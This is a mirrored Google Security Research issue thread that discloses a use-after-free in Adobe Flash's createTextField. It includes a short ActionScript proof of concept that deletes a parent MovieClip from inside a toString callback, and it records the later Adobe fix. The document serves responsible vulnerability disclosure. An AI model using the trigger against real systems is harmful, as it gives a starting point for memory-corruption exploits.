superuser5 / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Use-after-free in createTextField #408

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
There is a use-after-free in CreateTextField. If a flash file contains a 
MovieClip heirarcy, such as:

_root-->l1-->l2-->l3

If createTextField is called on l2 to create l3, and the call makes a call into 
a function the deletes l2 or l1, a use-after-free occurs. A POC is as follows:

var l1 = this.createEmptyMovieClip("l1", 1);
var l2 = l1.createEmptyMovieClip("l2", 1);
ns = {toString: strfunc, valueOf: strfunc};
var l3 = l2.createTextField(ns, 1, 0, 0, 10, 10);

function strfunc(){

    l2.removeMovieClip();
    return "myname";

    }

A sample SWF and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 27 May 2015 at 8:52

Attachments:

GoogleCodeExporter commented 9 years ago

Original comment by scvi...@google.com on 28 May 2015 at 4:59

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 29 May 2015 at 10:46

GoogleCodeExporter commented 9 years ago
This is PSIRT-3768

Original comment by natashe...@google.com on 1 Jun 2015 at 8:57

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:24

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:26

GoogleCodeExporter commented 9 years ago
Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html

Original comment by natashe...@google.com on 18 Aug 2015 at 7:38